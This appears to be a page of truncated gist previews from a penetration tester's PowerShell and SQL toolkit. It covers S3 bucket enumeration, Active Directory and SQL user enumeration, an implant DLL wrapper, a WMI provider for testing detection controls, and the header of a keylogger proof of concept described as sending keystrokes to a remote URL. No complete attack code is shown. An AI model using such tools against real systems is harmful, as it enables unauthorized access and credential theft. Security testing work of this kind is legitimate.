This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# ---------------------------------
# Get-PublicAwsS3BucketList
# ---------------------------------
# Author: Scott Sutherland (@_nullbind), NetSPI 2018
# Version: 0.5
# Description: This function can be used to obtain a list of keys (files) stored in AWS S3 buckets
# that have been made publicly readable. It also supports guessing S3 bucket names from a list of
# domains, on which it can perform permutations.
# Ref: https://docs.aws.amazon.com/AmazonS3/latest/API/v2-RESTBucketGET.html
# Ref: https://docs.aws.amazon.com/AmazonS3/latest/dev/using-with-s3-actions.html#using-with-s3-actions-related-to-buckets
# -------------------------------------------
# Function: Get-IPrange
# -------------------------------------------
# Author: BarryCWT
# Reference: https://gallery.technet.microsoft.com/scriptcenter/List-the-IP-addresses-in-a-60c5bb6b
function Get-IPrange
{
<#
.SYNOPSIS
Get the IP addresses in a range
# -------------------------------------------
# Function: Get-DomainObject
# -------------------------------------------
# Based on Get-ADObject function from:
# https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerView/powerview.ps1
function Get-DomainObject
{
[CmdletBinding()]
Param(
[Parameter(Mandatory=$false,
# ----------------------------------
# Get-SQLDomainUser
# ----------------------------------
# Author: Scott Sutherland
Function Get-SQLDomainUser
{
<#
.SYNOPSIS
Using the OLE DB ADSI provider, query Active Directory for a list of domain users
via the domain logon server associated with the SQL Server. This can be
# --------------------------------------------
# Create Form
# --------------------------------------------
# Create primary form
Add-Type -AssemblyName System.Windows.Forms
$Form = New-Object system.Windows.Forms.Form
$Form.Text = ""
#$Form.Opacity = 0.98 # 1.0 is fully opaque; 0.0 is invisible
# This is just a basic PowerShell wrapper for Alexander Leary's WheresMyImplant.dll.
# Source: https://github.com/0xbadjuju/WheresMyImplant/releases
# Note: This was hacked together for the sake of portability.
# Note: To refresh WheresMyImplant.dll do the following:
# $WMIBytes = [System.IO.File]::ReadAllBytes("C:\temp\WheresMyImplant.dll")
# $WMIString = [System.Convert]::ToBase64String($WMIBytes)
# Todo: Write wrapper functions in PowerShell, and maybe compress it :). In the meantime a RunCMD method example is below. Create test files and pester tests.
# The WheresMyImplant.dll
# This is a stand alone script to create a basic WMI provider for testing detective controls
# Author: Scott Sutherland, @_nullbind, NetSPI 2017
# -----------------------------------
# Setup and Compile WMI Provider DLL
# -----------------------------------
# Status user
write-output " * Generating WMI provider C# Code"
# This is a rough PoC based on https://www.tarlogic.com/en/blog/how-to-create-keylogger-in-powershell/
# Logging to file works
# Timer doesn't work (start runspace and kill it after a timeout)
# HTTP exfil doesn't work (add post function)
Function Invoke-MavisBeacon
{
<#
.SYNOPSIS
This is a script for logging keys to a file and sending them to a remote URL. Mostly, it's just a joke
-- Change the assembly name to the one you want to replace
CREATE ASSEMBLY [CommonLib] FROM
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.Security.Cryptography;
using System.IO;
using System.Diagnostics;
using System.Text;